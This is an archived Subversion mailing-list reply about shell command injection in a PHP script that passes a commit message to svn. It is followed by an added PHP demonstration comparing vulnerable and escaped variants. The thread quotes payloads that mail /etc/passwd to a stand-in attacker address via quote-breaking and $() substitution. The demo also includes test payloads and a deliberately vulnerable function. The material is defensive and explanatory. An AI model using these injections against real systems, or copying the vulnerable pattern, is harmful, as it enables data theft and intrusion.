
Re: PHP hack under way

From: Florian Weimer <fw_at_deneb.enyo.de>
Date: 2004-02-14 12:10:08 CET

Brian W. Fitzpatrick wrote:

> > $response = `svn commit -m \"$message\"`;

> I don't know offhand, but I suspect that you may be opening up a
> security hole the size of Texas by doing this. What if message is
> actually equal to
>
> "foo\" ; mail evilhaxor@example.com < /etc/passwd"
>
> or something worse.

With magic_quotes_gpc, this doesn't work, but

  $(mail evilhaxor@example.com < /etc/passwd)

probably does...

You could use escapeshellarg() and similar functions to preprocess the
argument, but I don't understand the C source code and still have an
uneasy feeling about them.

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org
Received on Sat Feb 14 12:10:38 2004
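The exchange above, written out as an added example (not code from the thread or from Subversion): the interpolating pattern from the original script, the same pattern behind magic_quotes_gpc-style addslashes(), the escapeshellarg() form, and a fourth variant that avoids the shell altogether. The hypothetical stand-in command `printf '%s\n'` replaces `svn commit -m` so the script runs without a working copy; whatever reaches printf as its second argument is exactly what svn would have received as the commit message. The commit messages are constructed test inputs.

```php
<?php
declare(strict_types=1);

// Constructed attacker-controlled "commit messages".
$payloads = [
    'fix typo',
    // Quote-breaking payload in the spirit of the thread; addslashes()
    // (what magic_quotes_gpc did to $_POST) neutralises this one.
    'foo" ; echo PWNED-1 #',
    // Command substitution: contains no quote, backslash or NUL byte,
    // so addslashes() leaves it untouched and the shell still runs it.
    '$(echo PWNED-2)',
    // Backticks behave the same way inside a double-quoted shell string.
    '`echo PWNED-3`',
];

// 1. The original pattern: interpolate straight into a double-quoted
//    shell string and hand it to /bin/sh.
function vulnerable(string $message): string
{
    return (string) shell_exec("printf '%s\\n' \"$message\"");
}

// 2. Same pattern with magic_quotes_gpc-style escaping applied first.
function magic_quoted(string $message): string
{
    $message = addslashes($message);
    return (string) shell_exec("printf '%s\\n' \"$message\"");
}

// 3. escapeshellarg(): single-quotes the value and escapes embedded
//    single quotes, so the whole message is one literal argv element.
function escaped(string $message): string
{
    return (string) shell_exec("printf '%s\\n' " . escapeshellarg($message));
}

// 4. No shell at all: proc_open() with an argv array (PHP >= 7.4)
//    execs the program directly, so nothing is parsed by /bin/sh.
//    Assumes a printf binary is on PATH (coreutils provides one).
function no_shell(string $message): string
{
    $spec = [1 => ['pipe', 'w']];
    $proc = proc_open(['printf', '%s\n', $message], $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('proc_open failed');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return $out;
}

foreach ($payloads as $message) {
    echo "message: $message\n";
    foreach (['vulnerable', 'magic_quoted', 'escaped', 'no_shell'] as $fn) {
        printf("  %-13s -> %s", $fn, $fn($message));
    }
}
```

Running it shows the asymmetry Florian describes: addslashes() stops only the payload that needs a literal quote, while `$(...)` and backticks execute under both the raw and the magic-quoted form and print `PWNED-2` / `PWNED-3` as the "message". escapeshellarg() and the argv form pass every payload through as literal text. When the shell can be avoided, the argv form is preferable because there is no quoting to get wrong; escapeshellarg() is the fallback when a shell pipeline is genuinely needed.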

This is an archived mail posted to the Subversion Users mailing list.
